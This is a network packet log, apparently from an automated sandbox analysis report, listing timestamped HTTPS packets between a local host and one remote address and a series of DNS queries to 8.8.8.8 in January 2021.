                                                        Jan 8, 2021 09:08:32.400615931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400638103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400651932 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400660038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400681973 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400690079 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.400706053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.400743008 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.401525021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409790039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409822941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409841061 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409857035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409882069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409903049 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.409910917 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.409934044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.410195112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410218000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410239935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410240889 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.410260916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410280943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.410281897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410306931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.410320044 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.411160946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411183119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411206007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411215067 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.411228895 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411251068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411268950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.411273003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.411313057 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.412069082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412095070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412115097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412137032 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.412137985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412163019 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412178040 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.412187099 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.412225962 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413041115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413065910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413086891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413106918 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413108110 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413129091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413144112 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413151026 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.413187027 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.413990021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414015055 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414036036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414055109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414071083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414088964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.414117098 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.414990902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.415040970 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416465998 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416490078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416512012 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416529894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416538000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416563034 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416582108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416589975 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416621923 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416881084 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416904926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416925907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416944981 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416946888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416970015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.416989088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.416990042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.417032957 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.417820930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420607090 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420631886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420651913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420672894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420681000 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.420695066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420711994 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.420720100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.420762062 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.421031952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421092033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421117067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421138048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.421139956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421163082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421183109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.421183109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.421224117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.422110081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589546919 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589581966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589678049 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.589709044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589735031 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589759111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589781046 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.589782953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589828968 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.589910030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589946032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589972019 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.589989901 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.589998007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.590023041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.590032101 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.590046883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.590082884 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.590831995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598445892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598475933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598503113 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598527908 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598551035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598562956 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.598573923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598601103 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.598623991 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.598809004 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598865032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598889112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598915100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598931074 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.598939896 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598967075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.598992109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.599771976 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.599915028 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.612497091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612529993 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612546921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612569094 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612591982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612612963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612678051 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.612714052 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.612900019 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612925053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612953901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612977982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.612988949 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.613001108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.613019943 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.613099098 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.613845110 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617574930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617600918 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617619991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617643118 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617666960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617690086 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.617744923 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.617774963 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.617989063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.618016005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.618041039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.618065119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.618091106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.618099928 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.618108988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.618181944 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.619044065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619069099 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619091988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619115114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619138002 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619153023 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.619160891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619164944 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.619215012 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.619918108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619942904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619966030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.619992971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620016098 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.620018959 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620044947 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620044947 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.620125055 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.620850086 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620872974 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620893955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620914936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620937109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620950937 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.620958090 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.620963097 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.621095896 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.621790886 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.621817112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.621840000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.621862888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.621869087 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.621886015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.621907949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.621916056 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.621969938 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.622715950 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624475956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624500036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624519110 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624538898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624562979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624583960 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.624586105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624613047 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.624902010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624927998 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624953032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624977112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.624978065 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.625000954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.625010014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.625020981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.625036955 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.625819921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.625947952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.630245924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630271912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630295038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630320072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630346060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630369902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630470037 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.630578041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630605936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630629063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630655050 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630676985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630696058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.630700111 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.630739927 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.631539106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.631661892 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.632117987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632143021 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632167101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632189035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632206917 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.632215023 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632239103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632265091 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.632632971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632658005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632680893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632704020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632728100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632750988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.632812023 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.632873058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.633533001 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.633944035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.633969069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.633991003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634015083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634040117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634067059 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634147882 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.634176016 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.634629011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634660006 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634685040 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634704113 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634727001 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634748936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.634759903 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.634795904 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.635421991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.635503054 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.637312889 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637340069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637362957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637398005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637420893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637430906 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.637445927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637482882 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.637794971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637819052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637840986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637862921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637885094 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637897968 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.637911081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.637944937 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.638613939 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.638782978 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.642275095 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642299891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642321110 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642345905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642369986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642394066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642401934 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.642453909 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:32.642735958 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642764091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642787933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642812014 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642836094 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:32.642858028 CET49177443192.168.2.22104.18.58.219

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 8, 2021 09:06:06.904562950 CET5219753192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:06.952363014 CET53521978.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:07.894315004 CET5309953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:07.952980995 CET53530998.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:07.957093954 CET5283853192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:08.004982948 CET53528388.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:18.620414019 CET6120053192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:18.668276072 CET53612008.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:19.309438944 CET4954853192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:19.493421078 CET53495488.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:24.867347002 CET5562753192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:24.923634052 CET53556278.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:24.946413994 CET5600953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:25.002636909 CET53560098.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:51.222317934 CET6186553192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:51.282998085 CET53618658.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:51.323060036 CET5517153192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:51.382138014 CET53551718.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:17.531116009 CET5249653192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:17.591433048 CET53524968.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:17.611469030 CET5756453192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:17.659508944 CET53575648.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:43.751187086 CET6300953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:43.810369015 CET53630098.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:43.828711987 CET5931953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:43.890265942 CET53593198.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:09.986008883 CET5307053192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:10.042922974 CET53530708.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:10.055391073 CET5977053192.168.2.228.8.8.8
